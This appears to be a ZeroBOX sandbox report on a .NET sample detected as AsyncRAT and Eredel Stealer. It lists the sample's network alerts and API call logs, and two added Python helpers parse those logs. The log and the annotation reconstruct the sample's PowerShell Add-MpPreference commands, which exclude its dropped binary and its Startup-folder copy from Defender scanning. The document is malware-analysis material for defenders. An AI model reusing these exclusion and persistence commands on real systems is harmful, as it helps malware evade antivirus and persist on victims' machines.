Summary | ZeroBOX

HostStartups.exe

Eredel Stealer Extended AsyncRAT AgentTesla info stealer browser email stealer Google Chrome User Data Antivirus Socket ScreenShot KeyLogger DNS AntiDebug PE32 PE File .NET EXE AntiVM
Category: FILE
Machine: s1_win7_x6402
Started: June 21, 2021, 8:25 p.m.
Completed: June 21, 2021, 8:27 p.m.
Size 33.8KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 6640bb72348963f486a0e0fb7a221587
SHA256 e8db1a4da9b1f907b663edd07b65c9d2bf767bc4901258a01347d3e3d268e07e
CRC32 DFD64045
ssdeep 768:wsjHfELkxt2Sd6mBPgNlXeQOR67scvnYnonXh6:wMsLkxtDLB4TZvxvYo8
Yara
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • IsPE32 - (no description)
  • Win_Eredel_Stealer_Extended_IN_Zero - Win Eredel Stealer Extended

IP Address Status Action
164.124.101.2 Active Moloch
172.217.25.14 Active Moloch
172.67.158.27 Active Moloch
95.90.186.169 Active Moloch

Suricata Alerts

Flow | SID | Signature | Category
UDP 192.168.56.102:57660 -> 164.124.101.2:53 | 2025104 | ET INFO DNS Query for Suspicious .gq Domain | Potentially Bad Traffic
TCP 192.168.56.102:49806 -> 172.67.158.27:80 | 2221034 | SURICATA HTTP Request unrecognized authorization method | Generic Protocol Command Decode
TCP 192.168.56.102:49806 -> 172.67.158.27:80 | 2032989 | ET INFO HTTP Request to a *.gq domain | Potentially Bad Traffic
TCP 192.168.56.102:49825 -> 172.67.158.27:80 | 2221034 | SURICATA HTTP Request unrecognized authorization method | Generic Protocol Command Decode
TCP 192.168.56.102:49825 -> 172.67.158.27:80 | 2032989 | ET INFO HTTP Request to a *.gq domain | Potentially Bad Traffic
TCP 192.168.56.102:49832 -> 172.67.158.27:80 | 2221034 | SURICATA HTTP Request unrecognized authorization method | Generic Protocol Command Decode
TCP 192.168.56.102:49832 -> 172.67.158.27:80 | 2032989 | ET INFO HTTP Request to a *.gq domain | Potentially Bad Traffic
UDP 192.168.56.102:50839 -> 164.124.101.2:53 | 2028675 | ET POLICY DNS Query to DynDNS Domain *.ddns .net | Potentially Bad Traffic
TCP 192.168.56.102:49806 -> 172.67.158.27:80 | 2221034 | SURICATA HTTP Request unrecognized authorization method | Generic Protocol Command Decode
TCP 192.168.56.102:49806 -> 172.67.158.27:80 | 2032989 | ET INFO HTTP Request to a *.gq domain | Potentially Bad Traffic
TCP 192.168.56.102:49825 -> 172.67.158.27:80 | 2221034 | SURICATA HTTP Request unrecognized authorization method | Generic Protocol Command Decode
TCP 192.168.56.102:49825 -> 172.67.158.27:80 | 2032989 | ET INFO HTTP Request to a *.gq domain | Potentially Bad Traffic
TCP 192.168.56.102:49832 -> 172.67.158.27:80 | 2221034 | SURICATA HTTP Request unrecognized authorization method | Generic Protocol Command Decode
TCP 192.168.56.102:49832 -> 172.67.158.27:80 | 2032989 | ET INFO HTTP Request to a *.gq domain | Potentially Bad Traffic
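Triage helper for the alert table above, added here as an example and not part of the ZeroBOX report. It parses the exported rows exactly as printed (the signature name and the Suricata classtype description run together in one field, so the two descriptions that occur in this report are used to split them), then collapses repeated (flow, SID) pairs so the number of distinct connections per destination is visible next to the raw row count. The `ALERT_ROWS` string is copied from the table; everything else is the helper's own naming.

```python
"""Pivot the Suricata alert rows of the report by destination.

Added triage helper (not part of the ZeroBOX report); it parses the alert
table as exported above and collapses repeated (flow, SID) rows so that the
number of distinct connections per destination is visible.
"""
import re
from collections import defaultdict

# Alert rows copied from the "Suricata Alerts" table above, in export order.
ALERT_ROWS = """\
UDP 192.168.56.102:57660 -> 164.124.101.2:53 2025104 ET INFO DNS Query for Suspicious .gq Domain Potentially Bad Traffic
TCP 192.168.56.102:49806 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49806 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
TCP 192.168.56.102:49825 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49825 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
TCP 192.168.56.102:49832 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49832 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
UDP 192.168.56.102:50839 -> 164.124.101.2:53 2028675 ET POLICY DNS Query to DynDNS Domain *.ddns .net Potentially Bad Traffic
TCP 192.168.56.102:49806 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49806 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
TCP 192.168.56.102:49825 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49825 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
TCP 192.168.56.102:49832 -> 172.67.158.27:80 2221034 SURICATA HTTP Request unrecognized authorization method Generic Protocol Command Decode
TCP 192.168.56.102:49832 -> 172.67.158.27:80 2032989 ET INFO HTTP Request to a *.gq domain Potentially Bad Traffic
"""

# The export runs the signature name and the Suricata classtype description
# together in one field; these are the two descriptions present in the report.
CATEGORIES = ("Potentially Bad Traffic", "Generic Protocol Command Decode")

ROW_RE = re.compile(
    r"^(?P<proto>TCP|UDP) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<sid>\d+) (?P<text>.+)$"
)


def parse_alerts(text):
    """Parse exported alert rows into dicts; rows that do not match are skipped."""
    alerts = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        signature, category = m["text"], ""
        for cat in CATEGORIES:
            if signature.endswith(" " + cat):
                signature, category = signature[: -len(cat) - 1], cat
                break
        alerts.append({
            "proto": m["proto"], "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"]), "sid": int(m["sid"]),
            "signature": signature, "category": category,
        })
    return alerts


def pivot_by_destination(alerts):
    """Summarise alerts per (dst, dport).

    'rows' counts every exported row; 'unique' counts distinct (flow, SID)
    pairs, so a flow listed twice with the same SID is only counted once.
    """
    seen = set()
    acc = defaultdict(lambda: {"rows": 0, "unique": 0, "flows": set(), "sids": set()})
    for a in alerts:
        flow = (a["proto"], a["src"], a["sport"], a["dst"], a["dport"])
        entry = acc[(a["dst"], a["dport"])]
        entry["rows"] += 1
        if (flow, a["sid"]) in seen:
            continue
        seen.add((flow, a["sid"]))
        entry["unique"] += 1
        entry["flows"].add(a["sport"])
        entry["sids"].add(a["sid"])
    return {
        key: {"rows": v["rows"], "unique": v["unique"],
              "flows": len(v["flows"]), "sids": sorted(v["sids"])}
        for key, v in acc.items()
    }


if __name__ == "__main__":
    for (dst, dport), summary in pivot_by_destination(parse_alerts(ALERT_ROWS)).items():
        print(f"{dst}:{dport} flows={summary['flows']} sids={summary['sids']} "
              f"rows={summary['rows']} unique={summary['unique']}")
```

Run stand-alone it reports 172.67.158.27:80 as three distinct client connections (source ports 49806, 49825, 49832) each firing both the *.gq and the unrecognised-Authorization-header rules, and 164.124.101.2:53 as the resolver that answered the .gq and ddns.net lookups; the row/unique split shows at a glance that twelve HTTP alert rows come from only six distinct flow-SID pairs.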

Suricata TLS

No Suricata TLS

API | Arguments | Status Return Repeated
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
API | Arguments | Status Return Repeated
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
IsDebuggerPresent | (none) | 0 0
API | buffer | console_handle | Status Return Repeated
WriteConsoleW | The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function | 0x00000023 | 1 1 0
WriteConsoleW | , script file, or operable program. Check the spelling of the name, or if a pat | 0x0000002f | 1 1 0
WriteConsoleW | h was included, verify that the path is correct and try again. | 0x0000003b | 1 1 0
WriteConsoleW | At line:1 char:17 | 0x00000047 | 1 1 0
WriteConsoleW | + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\Host | 0x00000053 | 1 1 0
WriteConsoleW | Startups.exe -Force | 0x0000005f | 1 1 0
WriteConsoleW | + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co | 0x0000006b | 1 1 0
WriteConsoleW | mmandNotFoundException | 0x00000077 | 1 1 0
WriteConsoleW | + FullyQualifiedErrorId : CommandNotFoundException | 0x00000083 | 1 1 0
WriteConsoleW | The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function | 0x00000023 | 1 1 0
WriteConsoleW | , script file, or operable program. Check the spelling of the name, or if a pat | 0x0000002f | 1 1 0
WriteConsoleW | h was included, verify that the path is correct and try again. | 0x0000003b | 1 1 0
WriteConsoleW | At line:1 char:17 | 0x00000047 | 1 1 0
WriteConsoleW | + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\Host | 0x00000053 | 1 1 0
WriteConsoleW | Startups.exe -Force | 0x0000005f | 1 1 0
WriteConsoleW | + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co | 0x0000006b | 1 1 0
WriteConsoleW | mmandNotFoundException | 0x00000077 | 1 1 0
WriteConsoleW | + FullyQualifiedErrorId : CommandNotFoundException | 0x00000083 | 1 1 0
WriteConsoleW | The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function | 0x00000023 | 1 1 0
WriteConsoleW | , script file, or operable program. Check the spelling of the name, or if a pat | 0x0000002f | 1 1 0
WriteConsoleW | h was included, verify that the path is correct and try again. | 0x0000003b | 1 1 0
WriteConsoleW | At line:1 char:17 | 0x00000047 | 1 1 0
WriteConsoleW | + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Roaming\Microso | 0x00000053 | 1 1 0
WriteConsoleW | ft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.e | 0x0000005f | 1 1 0
WriteConsoleW | xe -Force | 0x0000006b | 1 1 0
WriteConsoleW | + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co | 0x00000077 | 1 1 0
WriteConsoleW | mmandNotFoundException | 0x00000083 | 1 1 0
WriteConsoleW | + FullyQualifiedErrorId : CommandNotFoundException | 0x0000008f | 1 1 0
WriteConsoleW | The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function | 0x00000023 | 1 1 0
WriteConsoleW | , script file, or operable program. Check the spelling of the name, or if a pat | 0x0000002f | 1 1 0
WriteConsoleW | h was included, verify that the path is correct and try again. | 0x0000003b | 1 1 0
WriteConsoleW | At line:1 char:17 | 0x00000047 | 1 1 0
WriteConsoleW | + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Roaming\Microso | 0x00000053 | 1 1 0
WriteConsoleW | ft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.e | 0x0000005f | 1 1 0
WriteConsoleW | xe -Force | 0x0000006b | 1 1 0
WriteConsoleW | + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co | 0x00000077 | 1 1 0
WriteConsoleW | mmandNotFoundException | 0x00000083 | 1 1 0
WriteConsoleW | + FullyQualifiedErrorId : CommandNotFoundException | 0x0000008f | 1 1 0
WriteConsoleW | The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function | 0x00000023 | 1 1 0
WriteConsoleW | , script file, or operable program. Check the spelling of the name, or if a pat | 0x0000002f | 1 1 0
WriteConsoleW | h was included, verify that the path is correct and try again. | 0x0000003b | 1 1 0
WriteConsoleW | At line:1 char:17 | 0x00000047 | 1 1 0
WriteConsoleW | + Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\Host | 0x00000053 | 1 1 0
WriteConsoleW | Startups.exe -Force | 0x0000005f | 1 1 0
WriteConsoleW | + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co | 0x0000006b | 1 1 0
WriteConsoleW | mmandNotFoundException | 0x00000077 | 1 1 0
WriteConsoleW | + FullyQualifiedErrorId : CommandNotFoundException | 0x00000083 | 1 1 0
WriteConsoleW | The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function | 0x00000023 | 1 1 0
WriteConsoleW | , script file, or operable program. Check the spelling of the name, or if a pat | 0x0000002f | 1 1 0
WriteConsoleW | h was included, verify that the path is correct and try again. | 0x0000003b | 1 1 0

Each row is one console line; the PowerShell host wraps long lines at the window width without a newline, so the buffers have to be joined to read the echoed command. Reassembled, the two command lines PowerShell was asked to run are:

Add-MpPreference -ExclusionPath C:\Users\test22\AppData\Local\Temp\HostStartups.exe -Force
Add-MpPreference -ExclusionPath C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.exe -Force

Both end in CommandNotFoundException because this sandbox image is Windows 7 (s1_win7_x6402), which has no Windows Defender PowerShell module, so no exclusion was actually registered here. On Windows 8.1/10, where the module ships with the OS, the same lines run from an elevated context would exclude both the dropped binary in Temp and its Startup-folder copy from Defender scanning; the attempt itself is the defence-evasion indicator, not its outcome.
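The following helper is an added example, not part of the ZeroBOX report or the sample: it reassembles the wrapped console fragments recorded above and pulls out the Defender exclusion paths, treating a message whose echoed command line is missing (as in the truncated last message) as incomplete rather than guessing. The `WRITECONSOLE_BUFFERS` list is copied from three of the messages in the log; the function names, regexes and the `MESSAGE_START` boundary rule are the helper's own.

```python
"""Reassemble the wrapped PowerShell error text from the WriteConsoleW log
and extract the Defender exclusion paths the sample tried to register.

Added helper (not part of the ZeroBOX report). The sandbox records one
WriteConsoleW call per console line, and the PowerShell host wraps long
messages at the window width without a newline, so fragments must be joined
before the command line can be read back.
"""
import re
from collections import Counter

# WriteConsoleW buffers copied from the log above, in call order: the first
# message, the third message (Startup-folder path) and the truncated last one.
WRITECONSOLE_BUFFERS = [
    r"The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function",
    r", script file, or operable program. Check the spelling of the name, or if a pat",
    r"h was included, verify that the path is correct and try again.",
    r"At line:1 char:17",
    r"+ Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Local\Temp\Host",
    r"Startups.exe -Force",
    r"+ CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co",
    r"mmandNotFoundException",
    r"+ FullyQualifiedErrorId : CommandNotFoundException",
    r"The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function",
    r", script file, or operable program. Check the spelling of the name, or if a pat",
    r"h was included, verify that the path is correct and try again.",
    r"At line:1 char:17",
    r"+ Add-MpPreference <<<< -ExclusionPath C:\Users\test22\AppData\Roaming\Microso",
    r"ft\Windows\Start Menu\Programs\Startup\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4.e",
    r"xe -Force",
    r"+ CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co",
    r"mmandNotFoundException",
    r"+ FullyQualifiedErrorId : CommandNotFoundException",
    r"The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function",
    r", script file, or operable program. Check the spelling of the name, or if a pat",
    r"h was included, verify that the path is correct and try again.",
]

# Every PowerShell CommandNotFound message starts with this prefix, so it marks
# the boundary between consecutive messages in the console stream.
MESSAGE_START = "The term '"
# PowerShell 2.0 echoes the failing command after "+ " with a "<<<<" marker.
CMDLINE_RE = re.compile(r"\+ (Add-MpPreference <<<< .*?-Force)")
EXCLUSION_RE = re.compile(r"-ExclusionPath\s+(.+?)\s+-Force")


def reassemble(buffers):
    """Join wrapped console lines back into whole messages. No separator is
    inserted because the wrap happened mid-word ('pat' + 'h', 'Host' + 'Startups.exe')."""
    messages = []
    for buf in buffers:
        if buf.startswith(MESSAGE_START) or not messages:
            messages.append(buf)
        else:
            messages[-1] += buf
    return messages


def extract_exclusions(buffers):
    """Return (Counter of exclusion paths, number of messages with no command).

    A message whose echoed command line is missing (the log was cut off) is
    counted as incomplete rather than guessed at.
    """
    paths, incomplete = Counter(), 0
    for msg in reassemble(buffers):
        cmd = CMDLINE_RE.search(msg)
        if not cmd:
            incomplete += 1
            continue
        path = EXCLUSION_RE.search(cmd.group(1))
        if path:
            paths[path.group(1)] += 1
    return paths, incomplete


if __name__ == "__main__":
    found, missing = extract_exclusions(WRITECONSOLE_BUFFERS)
    for path, n in found.items():
        print(f"{n}x Add-MpPreference -ExclusionPath {path}")
    print(f"{missing} message(s) without a recoverable command line")
```

The two recovered paths are the IOCs worth keeping from this block: the dropped binary under Temp and the randomly named copy in the user's Startup folder, which is also the persistence location to check on a real host.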
API | Arguments | Status Return Repeated

blob_type 6 is PUBLICKEYBLOB; with buffer NULL (<INVALID POINTER>) and crypto_export_handle 0, every call is the length-query form of an unwrapped public-key export, consistent with a .NET RSA object exporting its public parameters rather than any key material leaving the process.

CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00521570, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x005215f0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x005215f0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593600, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593d80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593d80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593d80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593d80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593d80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593d80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x005935c0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x005935c0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x005935c0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x005931c0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593b80, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593f00, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593e40, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593e40, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593e40, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593e40, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593e40, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593e40, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593e40, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00593e40, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0034a580, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
API | Arguments | Status Return Repeated
GlobalMemoryStatusEx | (none) | 1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0x6a813e
0x6a7639
0x6a71c9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x6fba2652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fbb264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x6fbc9df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x6fbc9e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x6fbc9efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x6fbc9fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x6fc2564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x6fbfbe63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x6fbfb998
